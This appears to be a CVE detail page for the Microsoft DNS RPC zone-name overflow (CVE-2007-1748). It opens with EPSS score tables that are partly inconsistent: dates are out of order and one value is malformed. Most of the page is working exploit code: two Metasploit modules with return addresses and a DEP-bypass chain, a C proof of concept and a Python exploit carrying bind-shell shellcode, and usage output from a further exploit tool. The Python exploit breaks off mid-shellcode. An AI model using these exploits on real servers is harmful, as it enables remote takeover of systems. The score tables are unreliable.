CVE-2007-1748 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	88.18%	–	–
2023-03-12	–	–	–	96.81%	–
2023-04-23	–	–	–	96.96%	–
2023-05-28	–	–	–	96.94%	–
2023-09-17	–	–	–	96.89%	–
2023-10-29	–	–	–	96.69%	–
2023-12-03	–	–	–	96.65%	–
2024-01-14	–	–	–	96.83%	–
2024-02-18	–	–	–	96.76%	–
2024-06-02	–	–	–	96.93%	–
2024-06-02	–	–	–	96.93%	–
2024-12-22	–	–	–	96.96%	–
2025-03-09	–	–	–	96.94%	–
2025-01-19	–	–	–	96.96%	–
2025-03-09	–	–	–	96.94%	–
2025-03-18	–	–	–	–	84.06%
2025-03-18	–	–	–	–	84.06,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-04-23	1%
2023-05-28	1%
2023-09-17	1%
2023-10-29	1%
2023-12-03	1%
2024-01-14	1%
2024-02-18	1%
2024-06-02	1%
2024-06-02	1%
2024-12-22	1%
2025-03-09	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-18	99%

## # $Id: ms07_029_msdns_zonename.rb 10503 2010-09-28 15:23:14Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)', 'Description' => %q{ This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. This module exploits the RPC service using the \\DNSSERVER pipe available via SMB. This pipe requires a valid user account to access, so the SMBUSER and SMBPASS options must be specified. }, 'Author' => [ 'hdm', # initial module 'anonymous' # 2 anonymous contributors (2003 support) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10503 $', 'References' => [ ['CVE', '2007-1748'], ['OSVDB', '34100'], ['MSB', 'MS07-029'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx'] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 500, # The payload doesn't matter, but make_nops() uses these too 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ], # WS2HELP.DLL [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ], [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ], [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ], # Use the __except_handler3 method (and jmp esp in ATL.dll) [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ], [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ], # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll) [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ], [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], ], 'DisclosureDate' => 'Apr 12 2007', 'DefaultTarget' => 0 )) register_options( [ OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English']) ], self.class) end def gettarget(os) targets.each do |target| if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/)) return target end end return nil end def exploit connect() smb_login() if target.name =~ /Automatic/ case smb_peer_os() when 'Windows NT 4.0' print_status("Detected a Windows NT 4.0 system...") target = nil when 'Windows 5.0' print_status("Detected a Windows 2000 SP0-SP4 target...") target = gettarget('2000') when 'Windows 5.1' print_status("Detected a Windows XP system...") target = nil when /Windows Server 2003 (\d+)$/ print_status("Detected a Windows 2003 SP0 target...") target = gettarget('2003SP0') when /Windows Server 2003 (\d+) Service Pack (\d+)/ print_status("Detected a Windows 2003 SP#{$2} target...") target = gettarget('2003SP12') else print_status("Unknown OS: #{smb_peer_os}") return end end if (not target) print_status("There is no available target for this OS locale") return end print_status("Trying target #{target.name}...") # Bind to the service handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver']) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # Create our buffer with our shellcode first txt = Rex::Text.rand_text_alphanumeric(8192) if (target['OS'] =~ /2000/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [target.ret].pack('V') txt[ off - 4, 2] = "\xeb\x06" txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP0/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [target['Rets'][0]].pack('V') # __except_handler3 txt[ off - 4, 2] = "\xeb\x16" # addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9) addr = target['Rets'][1] - 4 addr1 = addr / 2 addr2 = addr1 + addr % 2 addr1 = addr1 + (addr2 % 12) addr2 = addr2 / 12 txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B # # then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here : # # 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0 # 0x77f443d0 mov eax, [ebp+arg_0] # 0x77f443d3 pop esi # 0x77f443d4 pop edi # 0x77f443d5 leave ; mov esp, ebp # 0x77f443d6 retn ; ret txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP12/) off = target['Off'] ib = target['IB'] txt[ off ] = [ib + 0x2566].pack('V') # to bypass NX we need to emulate the call to ZwSetInformationProcess # with generic value (to work on SP1-SP2 + patches) off = 445 # first we set esi to 0xed by getting the value on the stack # # 0x76a81da7: # pop esi <- esi = edh # retn txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V') txt[ off + 28, 4] = [0xed].pack('V') # now we set ecx to 0x7ffe0300, eax to 0xed # 0x76a81da4: # pop ecx <- ecx = 0x7ffe0300 # mov eax, esi <- eax == edh # pop esi # retn txt[ off + 32, 4] = [ib + 0x1da4].pack('V') txt[ off + 36, 4] = [0x7ffe0300].pack('V') # finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4) # 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX # 0x76a8109c: # call dword ptr [ecx] txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx] txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV') # we catch the second exception to go back to our shellcode, now that # NX is disabled off = 1013 txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll) txt[ off + 24, payload.encoded.length ] = payload.encoded end req = '' # Convert the string to escaped octal txt.unpack('C*').each do |c| req << "\\" req << c.to_s(8) end # Build the RPC stub data stubdata = NDR.long(rand(0xffffffff)) + NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") + NDR.long(rand(0xffffffff)) + NDR.string(req + "\x00") + NDR.long(rand(0xffffffff)) + NDR.string(Rex::Text.rand_text_alpha(1) + "\x00") print_status('Sending exploit...') begin response = dcerpc.call(1, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0]) end rescue ::Exception => e print_error("Error: #{e}") end handler disconnect end end

## # $Id: ms07_029_msdns_zonename.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)', 'Description' => %q{ This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. }, 'Author' => [ 'hdm', # initial module 'anonymous' # 2 anonymous contributors (2003 support) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ ['CVE', '2007-1748'], ['OSVDB', '34100'], ['MSB', 'MS07-029'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx'] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 500, # The payload doesn't matter, but make_nops() uses these too 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ], # WS2HELP.DLL [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ], [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ], [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ], # Use the __except_handler3 method (and jmp esp in ATL.dll) [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ], [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ], # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll) [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ], [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], ], 'DisclosureDate' => 'Apr 12 2007', 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(0), OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English']) ], self.class) end def gettarget(os) targets.each do |target| if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/)) return target end end return nil end def exploit # Ask the endpoint mapper to locate the port for us dport = datastore['RPORT'].to_i if ((dport != 0) && (target.name =~ /Automatic/)) print_error("Unable to use automatic targeting when RPORT is given"); return end if (dport == 0) dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp') if (not dport) print_error("Could not determine the RPC port used by the Microsoft DNS Server") return end print_status("Discovered Microsoft DNS Server RPC service on port #{dport}") end mytarget = nil if (target.name =~ /Automatic/) # scheduler service is only available on 2k3 SP0 and 2000 schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '1ff70682-0a51-30e8-076d-740be8cee98b', '1.0', 'ncacn_ip_tcp') if (not schedport) print_status("Detected a Windows 2003 SP1-SP2 target...") mytarget = gettarget('2003SP12') else # only available on 2003 SP0 schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp') if (not schedport) print_status("Detected a Windows 2000 SP0-SP4 target...") mytarget = gettarget('2000') else print_status("Detected a Windows 2003 SP0 target...") mytarget = gettarget('2003SP0') end end if (not mytarget) print_error("There is no available target for this locale") return end else mytarget = target end # Connect to the high RPC port connect(true, { 'RPORT' => dport }) print_status("Trying target #{target.name}...") # Bind to the service handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # Create our buffer with our shellcode first txt = Rex::Text.rand_text_alphanumeric(8192) if (target['OS'] =~ /2000/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [mytarget.ret].pack('V') txt[ off - 4, 2] = "\xeb\x06" txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP0/) txt[0, payload.encoded.length] = payload.encoded off = target['Off'] txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3 txt[ off - 4, 2] = "\xeb\x16" # addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9) addr = mytarget['Rets'][1] - 4 addr1 = addr / 2 addr2 = addr1 + addr % 2 addr1 = addr1 + (addr2 % 12) addr2 = addr2 / 12 txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B # # then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here : # # 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0 # 0x77f443d0 mov eax, [ebp+arg_0] # 0x77f443d3 pop esi # 0x77f443d4 pop edi # 0x77f443d5 leave ; mov esp, ebp # 0x77f443d6 retn ; ret txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V') # jmp esp txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') elsif (mytarget['OS'] =~ /2003SP12/) off = mytarget['Off'] ib = mytarget['IB'] txt[ off ] = [ib + 0x2566].pack('V') # to bypass NX we need to emulate the call to ZwSetInformationProcess # with generic value (to work on SP1-SP2 + patches) off = 445 # first we set esi to 0xed by getting the value on the stack # # 0x76a81da7: # pop esi <- esi = edh # retn txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V') txt[ off + 28, 4] = [0xed].pack('V') # now we set ecx to 0x7ffe0300, eax to 0xed # 0x76a81da4: # pop ecx <- ecx = 0x7ffe0300 # mov eax, esi <- eax == edh # pop esi # retn txt[ off + 32, 4] = [ib + 0x1da4].pack('V') txt[ off + 36, 4] = [0x7ffe0300].pack('V') # finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4) # 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX # 0x76a8109c: # call dword ptr [ecx] txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx] txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV') # we catch the second exception to go back to our shellcode, now that # NX is disabled off = 1013 txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll) txt[ off + 24, payload.encoded.length ] = payload.encoded end req = '' # Convert the string to escaped octal txt.unpack('C*').each do |c| req << "\\" req << c.to_s(8) end # Build the RPC stub data stubdata = NDR.long(rand(0xffffffff)) + NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") + NDR.long(rand(0xffffffff)) + NDR.string(req + "\x00") + NDR.long(rand(0xffffffff)) + NDR.string(Rex::Text.rand_text_alpha(1) + "\x00") print_status('Sending exploit...') begin response = dcerpc.call(1, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0]) end rescue ::Exception => e print_error("Error: #{e}") end handler disconnect end end

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows DNS DnssrvQuery() Stack Overflow * [CVE-2007-1748] * * * Description: * A vulnerability has been reported in Microsoft Windows, which can * be exploited by malicious people to compromise a vulnerable system. * The vulnerability is caused due to a boundary error in an RPC interface * of the DNS service used for remote management of the service. This can * be exploited to cause a stack-based buffer overflow via a specially * crafted RPC request. The DnssrvQuery function is vulnerable to this stack * overflow. * * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Advanced Server * Microsoft Windows 2000 Datacenter Server * Microsoft Windows 2000 Server * Microsoft Windows Server 2003 Datacenter Edition * Microsoft Windows Server 2003 Enterprise Edition * Microsoft Windows Server 2003 Standard Edition * Microsoft Windows Server 2003 Web Edition * Microsoft Windows Storage Server 2003 * * Tested on: * Microsoft Windows 2000 Advanced Server * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * <3 Metasploit for releasing it yesterday, only had time to look at it * this morning. Also props to Winny Thomas. * * There are two ways we can embed shellcode. One is to pad each byte of * the shellcode with '\' and jmp EBX. The other way is the one Winny used * which is to pass in the shellcode as the third argument in the rpc function * and jmp EDX after incrementing it appropriately. I used the latter :) * * ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye * * */ #include <iostream> #include <windows.h> #pragma comment( lib, "ws2_32" ) /* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char uszShellcode[] = "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab" "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2" "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca" "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56" "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37" "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe" "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde" "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04" "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19" "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8" "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81" "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba" "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f" "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d" "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04" "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb" "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90" "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96" "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02" "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85" "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d" "\x7d\xe0\xa6\xd2\xab\x1f\x00"; /* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */ unsigned char uszDceBind[] = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\xA4\xC2\xAB\x50\x4D\x57\xB3\x40\x9D\x66\xEE\x4F\xD5\xFB\xA0\x76" "\x05\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" "\x2B\x10\x48\x60\x02\x00\x00\x00"; /* DnssrvQuery: opnum 1 */ unsigned char uszDceCall[] = "\x05\x00\x00\x83\x10\x00\x00\x00\x7f\x06\x00\x00\x01\x00\x00\x00" "\x57\x06\x00\x00\x00\x00\x01\x00\xa4\xc2\xab\x50\x4d\x57\xb3\x40" "\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x10\xc2\x40\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\x02\x00\x00\x00\x44\x00\x00\x00\x94\xfa\x13\x00" "\xcc\x04\x00\x00\x00\x00\x00\x00\xcc\x04\x00\x00"; unsigned char uszDceEnd1[] = "\x41\x00\xb8\xc0\x40\x00\x57\x01\x00\x00\x00\x00\x00\x00\x57\x01" "\x00\x00"; unsigned char uszJmps[] = /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */ "\x5C\x29\x5C\x4C\x5C\xE1\x5C\x77" /* inc edx, jmp edx */ "\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" "\x5C\x42\x5C\xFF\x5C\xE2"; void usage( ) { printf("\n\t\tMicrosoft Windows DNS RPC Stack Overflow\n" "\t\t\t(c) 2007 devcode\n\n" "usage: dns.exe <ip> <port>\n"); } int main( int argc, char **argv ) { WSADATA wsaData; SOCKET sConnect; SOCKADDR_IN sockAddr; char szRecvBuf[4096]; unsigned char uszPacket[1663]; int nRet; if ( argc < 3 ) { usage( ); return -1; } if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { printf("[-] Unable to startup winsock\n"); return -1; } sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ( sConnect == INVALID_SOCKET ) { printf("[-] Invalid socket\n"); return -1; } sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); sockAddr.sin_port = htons( atoi( argv[2] ) ); printf("[+] Connecting to %s:%s\n", argv[1], argv[2] ); nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot connect to server\n"); return -1; } printf("[+] Sending DCE Bind packet...\n"); nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot send\n"); return -1; } nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); if ( nRet <= 0 ) { closesocket( sConnect ); printf("[-] Recv failed\n"); return -1; } memset( uszPacket, 0x5C, sizeof( uszPacket ) ); memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 ); memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 ); memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) ); memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) ); printf("[+] Sending DCE Request packet...\n"); nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot send\n"); return -1; } printf("[+] Check shell on port 4444 :)\n"); nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); closesocket( sConnect ); return 0; } // milw0rm.com [2007-04-15]

Exploit v2 features: - Target Remote port 445 (by default but requires auth) - Manual target for dynamic tcp port (without auth) - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting (auto target) - Windows 2000 server and Windows 2003 server (Spanish) supported by default - Fixed bug with Windows 2003 Shellcode - Universal local exploit for Win2k (automatic search for opcodes) - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled) - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns) - Microsoft RPC api used ( who cares? :p ) D:\Programación\DNSTEST>dnstest -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- Usage: dnstest -h 127.0.0.1 (Universal local exploit) dnstest -h host [-t id] [-p port] Targets: 0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3) 1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k ) 2 (0x7c4fedbb) - Win2k server SP4 English 3 (0x7963edbb) - Win2k server SP4 Italian 4 (0x41414141) - Windows all Denial of Service D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2 -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- [+] Trying to fingerprint target.. (05.02) [+] Remote Host identified as Windows 2003 [-] No port selected. Trying Ninja sk1llz [+] Binding to ncacn_ip_tcp: 192.168.1.2 [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0 [+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105] [+] Dynamic DNS rpc port found (1105) [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105] [+] RpcBindingFromStringBinding success [+] Sending Exploit code to DnssrvOperation() [+] Now try to connect to port 4444 also available at http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip) # milw0rm.com [2007-04-18]

#!/usr/bin/python # Remote exploit for the 0day Windows DNS RPC service vulnerability as # described in https://www.securityfocus.com/bid/23470/info. Tested on # Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 # and then connects to it. # # Cheers to metasploit for the first exploit. # Written for educational and testing purposes. # Author shall bear no responsibility for any damage caused by using this code # Winny Thomas :-) import os import sys import time from impacket.dcerpc import transport, dcerpc, epm from impacket import uuid #Portbind shellcode from metasploit; Binds port to TCP port 4444 shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" shellcode += 